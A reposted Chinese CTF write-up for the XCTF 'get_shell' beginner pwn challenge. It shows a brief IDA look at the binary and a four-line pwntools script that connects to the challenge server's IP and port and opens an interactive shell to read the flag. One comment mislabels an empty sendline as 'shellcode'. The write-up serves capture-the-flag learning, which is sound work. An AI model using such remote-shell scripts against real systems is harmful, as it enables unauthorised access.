PWN-攻防世界 get_shell

Posted xxx-echoed

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PWN-攻防世界 get_shell相关的知识,希望对你有一定的参考价值。

get_shell

难度系数: 6.0
题目描述:运行就能拿到shell呢,真的
题目场景:
220.249.52.133:57808
题目附件: 

链接:https://pan.baidu.com/s/13OAHCWRew06-jZINlvVUtA
提取码:eodj

直接拖进IDA64(如果是32位的文件IDA会报错的)

技术图片

 

 F5反汇编一下

技术图片

 

 够直接....

再一结合他的题目描述,可以的,没骗人

开始写EXP啦

from pwn import *   #导入 pwntools 中 pwn 包的所有内容
r = remote("220.249.52.133","57808")  # 链接服务器远程交互
r.sendline()  # 将shellcode 发送到远程连接
r.interactive()  # 将控制权交给用户,这样就可以使用打开的shell了

运行,结束

技术图片

 

 flag乖乖出来啦~

 flag就不打码了,没有什么必要

以上是关于PWN-攻防世界 get_shell的主要内容,如果未能解决你的问题,请参考以下文章

攻防世界pwn之新手练习区

pwn攻防世界 pwn新手区wp

CTF PWN-攻防世界XCTF新手区WriteUp

CTF PWN-攻防世界XCTF新手区WriteUp

攻防世界—pwn—hello_pwn

攻防世界—pwn—level2